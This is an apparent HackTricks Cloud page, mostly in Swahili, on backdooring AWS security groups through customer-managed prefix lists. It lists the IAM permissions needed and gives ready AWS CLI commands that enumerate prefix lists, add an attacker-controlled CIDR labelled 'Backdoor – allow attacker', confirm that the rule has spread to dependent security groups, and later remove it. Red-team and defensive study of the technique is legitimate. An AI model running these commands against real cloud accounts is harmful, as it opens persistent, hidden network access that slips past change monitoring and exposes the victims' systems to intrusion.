AWS - Security Group Backdoor via Managed Prefix Lists
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Muhtasari
Tumia vibaya customer-managed Prefix Lists kuunda njia ya kuingia kwa siri. Kama rule ya security group (SG) inarejea managed Prefix List, mtu yeyote mwenye uwezo wa kubadilisha list hiyo anaweza kimya kimya kuongeza CIDRs zinazodhibitiwa na mshambulizi. Kila SG (na huenda pia Network ACL au VPC endpoint) inayorejea list hiyo hukubali mara moja mikoa ya IP mpya bila mabadiliko yoyote yanayoonekana kwenye SG.
Athari
- Upanuzi wa papo hapo wa allowed IP ranges kwa SG zote zinazorejea prefix list, ukiepuka change controls ambazo zinafuatilia tu uhariri wa SG.
- Inaruhusu backdoors ya kudumu ya ingress/egress: weka CIDR hatarishi iliyofichwa ndani ya prefix list wakati rule ya SG inaonekana bila mabadiliko.
Mahitaji
- IAM permissions:
ec2:DescribeManagedPrefixListsec2:GetManagedPrefixListEntriesec2:ModifyManagedPrefixListec2:DescribeSecurityGroups/ec2:DescribeSecurityGroupRules(kutambua SG zilizounganishwa)- Optional:
ec2:CreateManagedPrefixListif creating a new one for testing. - Environment: Angalau rule moja ya SG inayorejea target customer-managed Prefix List.
Variables
REGION=us-east-1
PREFIX_LIST_ID=<pl-xxxxxxxx>
ENTRY_CIDR=<attacker-cidr/32>
DESCRIPTION="Backdoor – allow attacker"
Hatua za kushambulia
- Orodhesha prefix lists zinazowezekana na consumers
aws ec2 describe-managed-prefix-lists \
--region "$REGION" \
--query 'PrefixLists[?OwnerId==`<victim-account-id>`].[PrefixListId,PrefixListName,State,MaxEntries]' \
--output table
aws ec2 get-managed-prefix-list-entries \
--prefix-list-id "$PREFIX_LIST_ID" \
--region "$REGION" \
--query 'Entries[*].[Cidr,Description]'
Tumia aws ec2 describe-security-group-rules --filters Name=referenced-prefix-list-id,Values=$PREFIX_LIST_ID kuthibitisha ni sheria gani za SG zinategemea orodha hiyo.
- Ongeza attacker CIDR kwenye prefix list
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--add-entries Cidr="$ENTRY_CIDR",Description="$DESCRIPTION" \
--region "$REGION"
- Thibitisha kuenezwa kwa security groups
aws ec2 describe-security-group-rules \
--region "$REGION" \
--filters Name=referenced-prefix-list-id,Values="$PREFIX_LIST_ID" \
--query 'SecurityGroupRules[*].{SG:GroupId,Description:Description}' \
--output table
Trafiki kutoka $ENTRY_CIDR sasa imeruhusiwa kila mahali prefix list inapotajwa (kawaida outbound rules kwenye egress proxies au inbound rules kwenye shared services).
Ushahidi
get-managed-prefix-list-entriesinaonyesha CIDR ya mshambulizi na maelezo.describe-security-group-rulesbado inaonyesha sheria ya asili ya SG inayorejelea prefix list (hakuna marekebisho ya SG yaliyoripotiwa), lakini trafiki kutoka CIDR mpya inafanikiwa.
Usafishaji
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--remove-entries Cidr="$ENTRY_CIDR" \
--region "$REGION"
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
HackTricks Cloud